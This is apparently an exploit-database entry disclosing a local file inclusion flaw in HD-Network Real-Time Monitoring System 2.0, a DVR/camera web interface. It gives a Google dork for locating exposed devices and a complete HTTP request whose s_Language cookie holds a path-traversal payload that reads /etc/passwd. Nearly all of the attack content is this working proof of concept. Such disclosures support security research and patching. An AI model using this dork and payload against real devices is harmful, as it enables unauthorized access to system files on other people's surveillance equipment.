HD-Network Real-Time Monitoring System 2.0 Local File Inclusion

2021.12.13
Credit: Momen Eldawakhly
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
Dork: intitle:"HD-Network Real-time Monitoring System V2.0"

# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI) # Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" # Date: 11/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: N/A # Version: V2.0 # Tested on: Nginx NVRDVRIPC Web Server Proof of Concept: GET /language/lang HTTP/1.1 Referer: http://example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: VulnIP Connection: Keep-alive


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top